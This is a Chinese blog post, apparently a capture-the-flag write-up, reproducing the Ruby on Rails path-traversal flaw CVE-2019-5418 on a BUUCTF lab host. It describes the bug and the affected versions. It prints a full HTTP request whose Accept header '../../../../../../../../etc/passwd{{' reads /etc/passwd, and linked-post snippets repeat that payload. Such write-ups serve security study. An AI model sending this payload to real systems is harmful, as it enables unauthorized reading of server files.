buuctf [Rails]CVE-2019-5418

最新推荐文章于 2023-03-27 12:23:19 发布
最新推荐文章于 2023-03-27 12:23:19 发布
阅读量477 收藏 2
点赞数
分类专栏: buuctf real 文章标签: rails
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36241198/article/details/115387294
版权

漏洞描述

Ruby on Rails是一个 Web 应用程序框架,是一个相对较新的 Web 应用程序框架,构建在 Ruby 语言之上。它被宣传为现有企业框架的一个替代,而它的目标,就是让 Web 开发方面的生活,变得更轻松。在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。我们通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{头来构成构造路径穿越漏洞,读取任意文件。
https://www.freebuf.com/news/199617.html

漏洞影响

Ruby on Rails < 6.0.0.beta3
Ruby on Rails < 5.2.2.1
Ruby on Rails < 5.1.6.2
Ruby on Rails < 5.0.7.2

漏洞复现
在这里插入图片描述
正常访问http://node3.buuoj.cn:26318/robots,看到正常的robots.txt文件被读取出来。
在这里插入图片描述

抓包然后利用漏洞,发送如下数据包,读取/etc/passwd

GET /robots HTTP/1.1
Host: node3.buuoj.cn:26318
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept:../../../../../../../../etc/passwd{{
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: UM_distinctid=1785a4ff130456-0f22e64e92af97-4c3f227c-1fa400-1785a4ff131385; qSq_visitedfid=2; SESS95551f5ddaecb47376c20fedfc2d68a8=mqBaxWNzEDU58O5cN_rzfbqaJfPK0Lhjz130wXd_IIU; Drupal.toolbar.collapsed=0; _blog_session=zQn3GuUS6FuUDFOpZ%2FBYdZIDDhLmdATzJncf1YiGtdAU2do96VZ1hFsWO8a6HUAEUvaQ2fN4%2FmSMtGbad44EBS4oGYQepZX1M1ZxGoNkA7qUtmTwT1JKEl8ghXZCXpEqQdaDtCuCMxFvWZV7Kxo%3D--%2FrVvjt4BRBHRDloM--h3D1rLrPP8yhU%2FbYiazoAQ%3D%3D
Upgrade-Insecure-Requests: 1
If-None-Match: W/"d0f5e23d446407dcb86942663b29a1a3"
Cache-Control: max-age=0

在这里插入图片描述
成功读取到/etc/passwd

exploitsec
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
CVE-2019-5418漏洞复现
千寻的博客
01-07 4531
CVE-2019-5418漏洞复现 0x00 漏洞介绍 Ruby on Rails是一个web应用程序框架,是相对较新的web应用程序框架 构建在Ruby语言上 0x01漏洞原理 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。 通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{({{闭合模板路径)头来...
CVE-2019-5418(Ruby on Rails路径穿越与任意文件读取漏洞)
weixin_45620609的博客
08-05 1697
CVE-2019-5418:Ruby on Rails路径穿越与任意文件读取漏洞复现1.原理2.环境搭建3.漏洞复现4.漏洞修复 1.原理 Ruby on Rails(或者简称 Rails)是一个 Web 开发框架,使用 Ruby 编程语言开发。而2018主要是由于rails使用Sprockets作为静态文件服务器,在 Sprockets 3.7.1及之前版本中存在一个两次解码的路径穿越漏洞。而2019则主要是由于使用了为指定参数的render file来渲染应用之外的视图,修改访问某控制器的请求包,通过“
【漏洞复现】Ruby on Rails 路径穿越与任意文件读取漏洞(CVE-2019-5418
zg_111的博客
03-27 2001
【漏洞复现】Ruby on Rails 路径穿越与任意文件读取漏洞(CVE-2019-5418
(CVE-2019-5418)Ruby on Rails路径穿越与任意文件读取漏洞复现
whh6tl的博客
07-26 438
漏洞简介: Ruby on Rails是一个web应用程序框架,是相对较新的web应用程序框架 构建在Ruby语言上 威胁类型 远程代码执行,任意文件读取 威胁等级 高 漏洞编号 CVE-2019-5418 受影响系统及应用版本 Rails全版本 其中修复版本 6.0.0.beta3, 5.2.2.1 5.1.6.2 5.0.7.2 4.2.11.1 漏洞复现: 1、搭建环境 Ruby On Rails环境建设 1、安装git 2、安装rbenv到〜/ .rbenv目录 3、安装rbenv的插,用于编译
Ruby on Rails路径穿越与任意文件读取漏洞分析(CVE-2019-5418
whatday的专栏
08-27 1068
Ruby on Rails是一个 Web 应用程序框架,是一个相对较新的 Web 应用程序框架,构建在 Ruby 语言之上。它被宣传为现有企业框架的一个替代,而它的目标,就是让 Web 开发方面的生活,变得更轻松。 【CVE-2019-5418】漏洞公告:公告地址。 Versions Affected: All. Not affected: None. Fixed Versions: 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.1.
CVE-2019-5418
Foreverlove112的博客
10-01 279
CVE-2019-5418
Rails-doubletap-RCE:使用路径遍历(CVE-2019-5418)和Ruby对象反序列化(CVE-2019-5420)的Rails 5.2.2上的RCE
02-06
使用路径遍历(CVE-2019-5418)和Ruby对象反序列化的RCE on Rails 5.2.2(CVE-2019-5420) 技术分析: CVE-2019-5418- CVE-2019-5420- //hackerone.com/reports/473888 安全部门: CVE-2019-5418- //groups....
CVE-2019-5418CVE-2019-5418-Ruby on Rails上的文件内容披露
02-05
CVE-2019-5418是一个文件内容披露漏洞,存在于Ruby on Rails 5.0.x、5.1.x和5.2.x版本中。主要原因是Rails的ActionDispatch组件在处理某些URL时,未能正确验证和限制文件路径的访问。攻击者可以通过构造特殊的URL...
CVE-2020-8163:CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码
03-09
CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码 在Rails <5.0.1中远程执行用户提供的本地名称 5.0.1之前的Rails版本中存在一个漏洞,该漏洞将允许攻击者控制render调用的locals参数。 已为该漏洞...
CVE-2018-1111:CVE-2018-1111 DynoRoot
05-18
CVE-2018-1111,被称为 DynoRoot,是一个针对 Ruby on Rails 应用程序的安全漏洞,该漏洞在2018年被发现并公开。Ruby on Rails 是一个流行的开源 Web 开发框架,以其高效、简洁和灵活的代码结构深受开发者喜爱。然而...
rails-mister-cocktail:首先在heroku上部署rails应用-
02-10
朦胧的鸡尾酒 :cocktail_glass: :clinking_glasses: :cherries: :tumbler_glass: :lemon: :tropical_drink: 鸡尾酒经理,存储鸡尾酒和食谱。 我们想存储我们最喜欢的鸡尾酒及其食谱。 入门 Ruby版本 ...
CVE-2019-5418 Ruby on Rails 路径穿越与任意文件读取漏洞
weixin_51387754的博客
12-15 336
漏洞简介 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。我们通过传入Accept: ../../../../../../../../etc/passwd{{头来构成构造路径穿越漏洞,读取任意文件。 环境搭建 执行如下命令编译及启动Rail On Rails 5.2.2: docker-compose build docker-compose up -d 环境启动后,访问http://your-ip:3000即可看到Ruby on Rai
Ruby On Rails漏洞复现第二题(CVE-2019-5418) --目录穿越
小白鸽
07-31 522
01 背景介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态文件服务器。Sprockets是一个Ruby库,用于编译和分发静态资源文件。 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。 通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{ 头来构成构造路径穿越漏洞,读取任意文件。 ({{闭合模板路径) 02 影响版本 Rails全版本 其中修复版本
Cve2019-5418复现
Ping_Pig的博客
11-19 637
Vulhub环境: 启动目录/rails/CVE-2019-5418,启动命令:docker-compose up -d 随后访问http://you ip:3000 出现欢迎界面,然后访问/robots目录 Burp抓取该目录的数据包,修改accept为如下payload: ../../../../../../etc/passwd Msf的use auxiliary/gather/r...
vulfocus复现:Rails 文件读取 (CVE-2019-5418
m0_71518346的博客
12-17 209
描述(来自vulfocus):Ruby on Rails 是一个用于开发数据库驱动的网络应用程序的完整框架。
【墨者学院】Ruby On Rails 漏洞复现(CVE-2019-5418
hehigoxqc606的博客
08-31 359
【墨者学院】Ruby On Rails 漏洞复现(CVE-2019-5418) 漏洞原理:通过”chybete”路径或者访问“robots”路径这两个入口配合路径穿越和任意文件读取,可以读取任意文件,利用手法:通过“../../../../”来达到路径穿越的目的。然后再通过“{{”来进行模板查询路径的闭合。 闭合的目的是为了可以正常的解析 关于在测试过程中如何知道该测试框架是否为Ruby On Rails框架,关键是在一开始信息收集这步骤 第一步:访问靶场链接,得到如下页面 ...
墨者靶场 Ruby On Rails漏洞复现第二题(CVE-2019-5418
曹振国的博客
06-14 472
Ruby On Rails背景介绍解题方向漏洞详情影响版本一、通过burp读取二、利用Metasploit测试漏洞是否存在 背景介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态文件服务器。Sprockets是一个Ruby库,用于编译和分发静态资源文件。 解题方向 漏洞详情 关于漏洞的相关信息可以查看这篇文章:CVE-2019-5418 通过修改访问控制器的请求包,且会根据用户传入的Accept头来确定文件具体位置。通过Accept: ../
Ruby on Rails任意文件读取漏洞复现 - CVE-2019-5418
三天不打上房揭瓦的博客
12-21 476
前言:前言:小编也是现学现卖,方便自己记忆,写的不好的地方多多包涵,希望各位大佬多多批评指正。 目录简介漏洞概述影响版本环境搭建和漏洞利用漏洞修复 简介 Ruby on Rails 是一个可以使你开发、部署、维护 web 应用程序变得简单的框架。 漏洞概述 这个漏洞主要是由于Ruby on Rails使用了指定参数的render file来渲染应用之外的视图,我们可以通过修改访问某控制器的请求包,通过“…/…/…/…/”来达到路径穿越的目的,然后再通过“{{”来进行模板查询路径的闭合,使得所要访问的文件被当
Ruby On Rails漏洞(CVE-2019-5418
weixin_47493074的博客
09-16 435
Rails2019在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体的位置。
CVE-2020-27986 复现
最新发布
08-26
- *2* [CVE-2020-8163:CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码](https://download.csdn.net/download/weixin_42151305/15663762)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值